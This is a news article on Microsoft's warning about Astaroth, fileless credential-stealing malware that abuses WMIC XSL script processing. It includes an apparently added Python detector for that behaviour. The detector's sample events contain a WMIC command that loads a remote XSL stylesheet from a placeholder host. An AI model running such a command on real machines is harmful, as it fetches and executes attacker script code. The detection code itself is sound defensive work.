Microsoft warns Windows users of infamous info-stealing malware spreading rapidly
Researchers at MDATP (Microsoft Defender Advanced Threat Protection) are warning that an infamous credential-stealing malware is targeting Windows users. The malware, called Astaroth, is spreading rapidly because it relies on fileless execution and "living-off-the-land" techniques to evade detection by conventional AV tools, according to a new Microsoft report.
The researchers uncovered the latest attack scheme after Andrea Lelli, Senior Software Engineer at Microsoft, noticed an anomaly in a detection algorithm built to spot one particular kind of fileless technique. Fileless malware refers to malware variants that do not depend on files on disk to execute their malicious payload.
Looking more closely, the researchers saw a sharp rise in the use of the WMIC (Windows Management Instrumentation Command) tool to run XSL scripts ("XSL Script Processing"), which Microsoft classifies as a fileless attack technique.
The info-stealing malware Astaroth steals sensitive data such as keystrokes, credentials and other information, which it exfiltrates and sends to the remote attacker. www.healthitsecurity.com posted this, July 9, 2019.
To launch an attack, Astaroth typically uses a malicious link embedded in a spear-phishing email that leads the user to an LNK file. The method known as 'living off the land' then uses legitimate tools already present on the host machine so that the activity passes as normal operation. The attacker subsequently uses the stolen information to move laterally across the network.
Meanwhile, Cybereason security researcher Eli Salem says the Astaroth attacks are considered difficult to identify because the entire deployment and execution of the malware happens through Windows LOLBins. Normally, such an operation looks like legitimate Windows activity because it is carried out by Windows processes.
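The WMIC XSL-script-processing behaviour the researchers keyed on can be surfaced from ordinary process-creation telemetry; the following is an added example, not Microsoft's or Cybereason's detection logic. It assumes Sysmon/EDR-style (parent image, command line) records, uses WMIC's real `/format:` switch, and runs over constructed sample events.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation events (not taken from the article).
# Each tuple is (parent image, command line) as an EDR or Sysmon record would log it.
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe", r'"C:\Windows\System32\wbem\WMIC.exe" os get caption /format:csv'),
    (r"C:\Windows\System32\cmd.exe", r'wmic os get /format:"https://cdn.example.invalid/xyz.xsl"'),
    (r"C:\Windows\System32\svchost.exe", r"WMIC.exe process list brief"),
    (r"C:\Windows\System32\cmd.exe", r"wmic /format:C:\Users\Public\out.xsl computersystem get"),
    (r"C:\Windows\explorer.exe", r"cmd.exe /c wmic.exe os get /format:list"),
]

# Match wmic / wmic.exe whether invoked bare, by full path or via cmd.exe /c.
WMIC_RE = re.compile(r"(?:^|[\\\s\"])wmic(?:\.exe)?\b", re.IGNORECASE)
# Capture the stylesheet argument of /format:, with or without quotes.
FORMAT_RE = re.compile(r'/format:\s*"?([^\s"]+)', re.IGNORECASE)
# Style names that ship with WMIC; anything else is an operator-supplied stylesheet.
BUILTIN_STYLES = {"csv", "hform", "htable", "list", "mof", "rawxml",
                  "table", "textvaluelist", "value", "xml"}


def classify_event(parent_image, cmdline):
    """Return 'not-wmic', 'benign', 'remote-xsl' or 'local-xsl' for one record."""
    if not WMIC_RE.search(cmdline):
        return "not-wmic"
    match = FORMAT_RE.search(cmdline)
    if not match:
        return "benign"  # WMIC without /format: cannot load a stylesheet
    style = match.group(1).strip().strip("'").lower()
    if style in BUILTIN_STYLES:
        return "benign"
    # A URL or a path means WMIC will fetch that XSL and execute any script it embeds,
    # which is the fileless, living-off-the-land pattern described above.
    if urlparse(style).scheme in ("http", "https", "ftp"):
        return "remote-xsl"
    return "local-xsl"


def scan(events):
    """Return (parent, cmdline, verdict) for every event that warrants an alert."""
    alerts = []
    for parent, cmdline in events:
        verdict = classify_event(parent, cmdline)
        if verdict in ("remote-xsl", "local-xsl"):
            alerts.append((parent, cmdline, verdict))
    return alerts


if __name__ == "__main__":
    for parent, cmdline, verdict in scan(SAMPLE_EVENTS):
        print(f"[{verdict}] parent={parent} cmd={cmdline}")
```

Built-in style names are allow-listed rather than blocked because legitimate administration scripts use them routinely; the remote-URL case is the higher-confidence signal.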
Also, a new threat intelligence report by WatchGuard notes that fileless threats appeared in both of WatchGuard's lists, the ten most prolific malware and the ten most high-profile network attacks. Among the malware threats, a PowerShell-based code-injection attack entered the ten most prolific malware list for the first time. Likewise, Meterpreter, a widely used fileless backdoor, appeared for the first time among the ten most high-profile network attacks.
» SPAMfighter News - 7/19/2019